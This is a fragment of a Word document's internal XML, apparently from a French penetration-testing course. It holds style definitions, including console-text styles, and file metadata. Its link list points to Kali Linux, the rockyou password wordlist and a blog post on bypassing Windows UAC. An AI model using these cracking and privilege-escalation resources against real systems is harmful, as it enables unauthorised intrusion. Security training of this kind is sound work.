      <w:spacing w:before="60"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:i/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1002" w:customStyle="1">
    <w:name w:val="interligne"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="954"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="1003">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="964"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:color w:val="0000ff"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1004">
    <w:name w:val="List Number"/>
    <w:basedOn w:val="991"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:ind w:left="397" w:hanging="329"/>
      <w:spacing w:before="80"/>
      <w:tabs>
        <w:tab w:val="num" w:pos="0" w:leader="none"/>
        <w:tab w:val="num" w:pos="142" w:leader="none"/>
        <w:tab w:val="clear" w:pos="360" w:leader="none"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1005">
    <w:name w:val="List Bullet"/>
    <w:basedOn w:val="991"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:ind w:left="408" w:hanging="340"/>
      <w:spacing w:before="80"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="360" w:leader="none"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1006">
    <w:name w:val="List Bullet 2"/>
    <w:basedOn w:val="991"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="5"/>
      </w:numPr>
      <w:ind w:left="709" w:hanging="284"/>
      <w:spacing w:before="20" w:after="20"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="0" w:leader="none"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="1007">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="964"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:sz w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1008" w:customStyle="1">
    <w:name w:val="Module suite"/>
    <w:basedOn w:val="994"/>
    <w:next w:val="954"/>
    <w:pPr>
      <w:keepNext/>
      <w:pageBreakBefore/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1009" w:customStyle="1">
    <w:name w:val="MRS-Pictos"/>
    <w:basedOn w:val="991"/>
    <w:pPr>
      <w:ind w:left="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1010" w:customStyle="1">
    <w:name w:val="MRS-Schémas"/>
    <w:basedOn w:val="991"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1011" w:customStyle="1">
    <w:name w:val="MRS-Unités"/>
    <w:basedOn w:val="991"/>
    <w:pPr>
      <w:ind w:left="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1012" w:customStyle="1">
    <w:name w:val="MRS-Tableaux"/>
    <w:basedOn w:val="1011"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1013">
    <w:name w:val="Block Text"/>
    <w:basedOn w:val="954"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:pPr>
      <w:ind w:left="74" w:right="215"/>
      <w:jc w:val="both"/>
      <w:spacing w:before="60"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="1014">
    <w:name w:val="page number"/>
    <w:basedOn w:val="964"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1015" w:customStyle="1">
    <w:name w:val="Texte tableau"/>
    <w:pPr>
      <w:ind w:left="74" w:right="74"/>
      <w:spacing w:before="60" w:after="60"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1016">
    <w:name w:val="index heading"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="999"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:pPr>
      <w:jc w:val="center"/>
      <w:spacing w:before="240" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1017">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="954"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:pPr>
      <w:ind w:left="880"/>
      <w:spacing w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1018">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="954"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:pPr>
      <w:ind w:left="1100"/>
      <w:spacing w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1019">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="954"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:pPr>
      <w:ind w:left="1320"/>
      <w:spacing w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1020">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="954"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:pPr>
      <w:ind w:left="1540"/>
      <w:spacing w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1021">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="954"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:pPr>
      <w:ind w:left="1760"/>
      <w:spacing w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1022">
    <w:name w:val="Caption"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="954"/>
    <w:uiPriority w:val="35"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1023" w:customStyle="1">
    <w:name w:val="Type-document"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000080"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1024" w:customStyle="1">
    <w:name w:val="Titre du document"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="38"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1025" w:customStyle="1">
    <w:name w:val="Suivi_version"/>
    <w:pPr>
      <w:jc w:val="center"/>
      <w:spacing w:before="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1026" w:customStyle="1">
    <w:name w:val="Sous-titre Alphabétique"/>
    <w:next w:val="991"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="6"/>
      </w:numPr>
      <w:ind w:left="397" w:hanging="340"/>
      <w:spacing w:before="120"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="388" w:leader="none"/>
      </w:tabs>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:sz w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1027" w:customStyle="1">
    <w:name w:val="Sous-titre Puce"/>
    <w:basedOn w:val="1026"/>
    <w:next w:val="991"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:ind w:left="360" w:hanging="360"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1028" w:customStyle="1">
    <w:name w:val="Num Tableau"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:ind w:left="539" w:hanging="284"/>
      <w:jc w:val="center"/>
      <w:spacing w:before="60" w:after="60"/>
      <w:tabs>
        <w:tab w:val="num" w:pos="0" w:leader="none"/>
        <w:tab w:val="num" w:pos="142" w:leader="none"/>
        <w:tab w:val="clear" w:pos="360" w:leader="none"/>
      </w:tabs>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial Gras" w:hAnsi="Arial Gras"/>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1029" w:customStyle="1">
    <w:name w:val="MRS-Pictos-Conception"/>
    <w:pPr>
      <w:spacing w:before="120"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1030">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="964"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1031">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="954"/>
    <w:link w:val="1032"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1032" w:customStyle="1">
    <w:name w:val="Texte de bulles Car"/>
    <w:basedOn w:val="964"/>
    <w:link w:val="1031"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1033" w:customStyle="1">
    <w:name w:val="Diffusion VeePee"/>
    <w:next w:val="991"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1034" w:customStyle="1">
    <w:name w:val="MRS-VeePee-pictos"/>
    <w:basedOn w:val="1012"/>
  </w:style>
  <w:style w:type="character" w:styleId="1035" w:customStyle="1">
    <w:name w:val="Titre1"/>
    <w:basedOn w:val="964"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1036" w:customStyle="1">
    <w:name w:val="EF - chapitre titre"/>
    <w:next w:val="1039"/>
    <w:link w:val="1038"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="7"/>
      </w:numPr>
      <w:ind w:left="340" w:hanging="340"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial Gras" w:hAnsi="Arial Gras" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="4d4d4d"/>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1037" w:customStyle="1">
    <w:name w:val="Module Car"/>
    <w:basedOn w:val="964"/>
    <w:link w:val="994"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="000080"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1038" w:customStyle="1">
    <w:name w:val="EF - chapitre titre Car"/>
    <w:basedOn w:val="1037"/>
    <w:link w:val="1036"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial Gras" w:hAnsi="Arial Gras" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="4d4d4d"/>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1039" w:customStyle="1">
    <w:name w:val="EF module titre"/>
    <w:next w:val="1040"/>
    <w:link w:val="1041"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="7"/>
      </w:numPr>
      <w:ind w:left="340" w:hanging="340"/>
      <w:keepLines/>
      <w:spacing w:after="360"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="0a9e97"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1040" w:customStyle="1">
    <w:name w:val="EF étiquette"/>
    <w:link w:val="1044"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="7"/>
      </w:numPr>
      <w:ind w:left="0" w:hanging="180"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1041" w:customStyle="1">
    <w:name w:val="EF module titre Car"/>
    <w:basedOn w:val="1037"/>
    <w:link w:val="1039"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="0a9e97"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1042" w:customStyle="1">
    <w:name w:val="EF sous étiquette"/>
    <w:basedOn w:val="992"/>
    <w:link w:val="1047"/>
    <w:qFormat/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="1043" w:customStyle="1">
    <w:name w:val="Fragment Car"/>
    <w:basedOn w:val="964"/>
    <w:link w:val="995"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1044" w:customStyle="1">
    <w:name w:val="EF étiquette Car"/>
    <w:basedOn w:val="1043"/>
    <w:link w:val="1040"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1045" w:customStyle="1">
    <w:name w:val="EF texte standard"/>
    <w:basedOn w:val="991"/>
    <w:link w:val="1049"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1046" w:customStyle="1">
    <w:name w:val="Sous-fragment Car"/>
    <w:basedOn w:val="964"/>
    <w:link w:val="992"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:i/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1047" w:customStyle="1">
    <w:name w:val="EF sous étiquette Car"/>
    <w:basedOn w:val="1046"/>
    <w:link w:val="1042"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:i/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1048" w:customStyle="1">
    <w:name w:val="Texte fragment Car"/>
    <w:basedOn w:val="964"/>
    <w:link w:val="991"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1049" w:customStyle="1">
    <w:name w:val="EF texte standard Car"/>
    <w:basedOn w:val="1048"/>
    <w:link w:val="1045"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1050">
    <w:name w:val="index 3"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="954"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="660" w:hanging="220"/>
      <w:spacing w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1051">
    <w:name w:val="index 4"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="954"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="880" w:hanging="220"/>
      <w:spacing w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1052">
    <w:name w:val="index 5"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="954"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="1100" w:hanging="220"/>
      <w:spacing w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1053">
    <w:name w:val="index 6"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="954"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="1320" w:hanging="220"/>
      <w:spacing w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1054">
    <w:name w:val="index 7"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="954"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="1540" w:hanging="220"/>
      <w:spacing w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1055">
    <w:name w:val="index 8"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="954"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="1760" w:hanging="220"/>
      <w:spacing w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1056">
    <w:name w:val="index 9"/>
    <w:basedOn w:val="954"/>
    <w:next w:val="954"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="1980" w:hanging="220"/>
      <w:spacing w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="numbering" w:styleId="1057" w:customStyle="1">
    <w:name w:val="EPMI - 1.1.1."/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="9"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:styleId="1058" w:customStyle="1">
    <w:name w:val="EPMI N° chapite + module"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="8"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1059" w:customStyle="1">
    <w:name w:val="CLI"/>
    <w:qFormat/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
      <w:pBdr>
        <w:top w:val="single" w:color="548DD4" w:themeColor="text2" w:themeTint="99" w:sz="4" w:space="1"/>
        <w:left w:val="single" w:color="548DD4" w:themeColor="text2" w:themeTint="99" w:sz="4" w:space="4"/>
        <w:bottom w:val="single" w:color="548DD4" w:themeColor="text2" w:themeTint="99" w:sz="4" w:space="1"/>
        <w:right w:val="single" w:color="548DD4" w:themeColor="text2" w:themeTint="99" w:sz="4" w:space="4"/>
      </w:pBdr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
      <w:color w:val="ffffff" w:themeColor="background1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1060" w:customStyle="1">
    <w:name w:val="PS"/>
    <w:basedOn w:val="1059"/>
    <w:next w:val="1045"/>
    <w:qFormat/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="17365d" w:themeFill="text2" w:themeFillShade="BF"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1061">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="954"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:pPr>
      <w:contextualSpacing/>
      <w:ind w:left="720"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="1062" w:customStyle="1">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="964"/>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3.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject2.bin"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.techspot.com/downloads/6738-kali-linux.html" TargetMode="External"/><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hyperlink" Target="https://www.google.com/url?sa=t&amp;rct=j&amp;q=&amp;esrc=s&amp;source=web&amp;cd=&amp;ved=2ahUKEwi84-KMh_f7AhU8TaQEHffnBY0QFnoECA4QAQ&amp;url=https%3A%2F%2Fgithub.com%2Fbrannondorsey%2Fnaive-hashcat%2Freleases%2Fdownload%2Fdata%2Frockyou.txt&amp;usg=AOvVaw3snAERl1mU6Ccr4WFEazBd"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https://www.techspot.com/downloads/6738-kali-linux.html" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html" TargetMode="Externa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yperlink" Target="https://pentesthacker.wordpress.com/2020/12/24/bypassing-uac-in-windows-10/" TargetMode="Externa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oleObject" Target="embeddings/oleObject1.bin"/></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96269-46F9-4D51-B28F-11669DE54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ONLYOFFICE/7.2.1.34</Application>
  <Company>ARTECOMM - Tel : 04 50 52 05 03</Company>
  <DocSecurity>0</DocSecurity>
  <HyperlinksChanged>false</HyperlinksChanged>
  <LinksUpToDate>false</LinksUpToDate>
  <Manager>Version commerciale VeePee</Manager>
  <ScaleCrop>false</ScaleCrop>
  <SharedDoc>false</SharedDoc>
  <Template>MRS VEEPEE V81</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Version 8.1 B - 17/08/2007</dc:subject>
  <dc:creator>yann</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Yann BENHAMRON</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-12-22T08:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-12-28T12:28:59Z</dcterms:modified>
</cp:coreProperties>
</file>